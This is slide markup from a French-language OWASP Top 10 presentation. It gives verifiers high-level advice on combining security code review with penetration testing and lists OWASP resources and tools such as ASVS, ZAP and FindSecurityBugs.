                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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3169454">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000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Afin de vérifier la sécurité d’une application web que vous avez développé ou que vous envisagez d’acquérir, l’OWASP recommande d’examiner le code applicatif (si le code source est disponible) et de tester l’application. L’OWASP recommande la combinaison d’une revue du code liée à la sécurité et l’établissement d’un test d’intrusion applicatif dès que cela s’avère possible, cela permet d’augmenter le niveau de résultat des deux techniques, les deux approches se complétant mutuellement. Les outils facilitant le processus de vérification peuvent améliorer l’efficience et l’efficacité d’un analyste expert. Les outils d’évaluation de l’OWASP se focalisent sur l’aide apportée à un expert afin de devenir plus efficace, plutôt que de tenter d’automatiser le processus d’analyse.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Standardisation – Comment Vérifiez Vous la Sécurité d’Application Web: Afin d’aider les organisations à développer de la cohérence et de définir un niveau de rigueur lors de l’évaluation d’applications web, l’OWASP a produit l’OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Standard de Vérification de Sécurité Applicative (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. Ce document définit un standard de vérification minimum pour effectuer l’évaluation de sécurité des applications web. L’OWASP recommande d’utiliser ASVS comme guide pas seulement lorsque vous vérifiez la sécurité d’une application Web, mais aussi sur les techniques les plus appropriées à utiliser, et de vous aider à définir et sélectionner un niveau de rigueur lorsque vous vérifiez la sécurité d’application web. L’OWASP recommande par ailleurs l’utilisation de l’ASVS pour vous aider à définir et sélectionner tout service d’évaluation d’application web que vous pourriez vous procurer par un fournisseur tiers.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Suite d’Outils d’Evaluation : Le projet </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Live CD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> consolide plusieurs des meilleurs outils de sécurité open source dans un environnement de démarrage ou dans une machine virtuelle (VM). Les développeurs web, testeurs, et professionnels de la sécurité peuvent exécuter ce Live CD, or exécuter la VM, et immédiatement avoir accès à une suite complète de test de sécurité. Aucune installation ni configuration n’est requise pour utiliser les outils fournis sur ce CD.</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000" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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000" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Perspective pour les vérificateurs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6"/>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+V</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607643974"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4419600"/>
          <a:ext cx="3581400" cy="4745216"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3581400"/>
              </a:tblGrid>
              <a:tr h="314464">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Revue de Code</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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4409936">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>La revue de code en sécurité est particulièrement adaptée pour vérifier qu’une application contient des mécanismes de sécurité forts, et de trouver des éléments qui seraient difficiles à identifier en examinant les données de sorties. Tester une application est adapté pour prouver que des failles sont exploitables. Cela étant, les deux approches sont complémentaires et se recoupent dans quelques domaines.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Revue de Code : En tant que compagnon du </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Guide du Développeur OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, et le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Guide des Tests OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, l’OWASP a produit le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Guide de la Revue de Code OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> pour aider les développeurs et les spécialistes de la sécurité applicative à comprendre comment examiner de manière efficiente et efficace la sécurité d’une application web par la revue de code. Il y a de nombreuses questions de sécurité applicatives, tel que les failles d’injection, qui sont de loin plus facile à déterminer au travers de la revue de code que du test externe.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Outil de Revue de Code : L’OWASP a fait du travail prometteur dans le domaine de l’assistance aux experts pour effectuer de l’analyse de code, mais ces outils sont encore à leurs débuts. Les auteurs de ces outils les utilisent chaque jour lorsqu’ils effectuent leurs revues de code en sécurité, mais les non-experts pourraient trouver ces outils compliqués d’utilisation. Cela inclut </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CodeCrawler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Orizon</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>O2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. Seul </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>O2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> a été en développement actif depuis la dernière version du Top 10 en 2010.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Il y a d’autres outils de revue de code gratuits et open source. Le plus prometteur est </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>FindBugs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, et son nouveau plugin de sécurité s’appelle </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>FindSecurityBugs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, les deux étant sous Java.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>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88758281"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3581400" y="4419600"/>
          <a:ext cx="3276600" cy="4744720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3276600"/>
              </a:tblGrid>
              <a:tr h="323455">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>Sécurité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t> et Test </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0"/>
                        <a:t>d’Intrusion</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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4400945">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="400"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Tester l’Application : L’OWASP a développé le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>TestingGuide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> pour aider les développeurs, testeurs, et spécialistes de la sécurité à comprendre comment tester de manière efficace et efficiente la sécurité des applications web. Cet énorme guide, qui au travers de douzaines de contributeurs, fournit un vaste ensemble de sujets sur les tests de sécurité des applications web. Une revue de code a ses avantages, les tests de sécurité aussi. Il est très intéressant de pouvoir prouver qu’une application est non sécurisée en démontrant l’exploit. Il y a beaucoup de question de sécurité, particulièrement toutes les sécurités fournies par l’infrastructure applicative, qui ne peuvent être vues au travers de la revue de code, du fait que l’application ne porte pas la sécurité par elle-même.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Outils de Tests d’Intrusion Applicatifs : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>WebScarab</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, qui a été un des plus utilisés de tous les projets OWASP, et le nouveau </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>ZAP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, qui maintenant est bien plus populaire, sont tous deux des proxys de test d’application web. Ils permettent aux analystes sécurité d’intercepter les requêtes d’application web, ainsi les analystes peuvent imaginer comment l’application fonctionne, et donc de permettre à l’analyste de soumettre des requêtes de test afin de voir si l’application répond de manière sécurité à de telles requêtes. Ces outils sont particulièrement efficaces pour assister un analyste à la découverte de failles XSS, des failles d’Authentification, et des failles de Contrôle d’Accès. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>ZAP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> a même un </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>scanner actif</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> intégré, et cela GRATUITEMENT !</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3726567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just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Release Candidate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567359" y="1981200"/>
            <a:ext cx="5609228" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:latin typeface="Stencil" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Remarque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Stencil" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Importante</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Stencil" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
